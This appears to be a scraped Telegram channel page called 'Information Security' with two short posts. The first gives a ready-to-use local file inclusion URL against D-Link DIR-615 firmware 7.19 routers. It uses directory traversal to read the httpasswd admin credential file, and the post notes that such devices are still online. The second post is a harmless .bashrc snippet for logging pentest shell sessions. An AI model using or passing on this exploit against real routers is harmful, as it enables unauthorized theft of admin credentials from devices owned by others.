Information Security
412 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
LFI for Dlink DIR-615 Fw 7.19 (Malaysia version, EOL reached - but still online).

Read ADMIN credentials of remote front-end:

http://<DIR-615 IP>:8080/model/__lang_msg.php?MY_MSG_FILE=../../../var/etc/httpasswd
For pentesting, Add this to your .bashrc file:

PS1='[date +"%d-%b-%y %T"] > '
test "$(ps -ocommand= -p $PPID | awk '{print $1}')" == 'script' || (script -f $HOME/logs/$(date +"%d-%b-%y_%H-%M-%S")_shell.log)

Now you can have a log of everything you did and when you did it.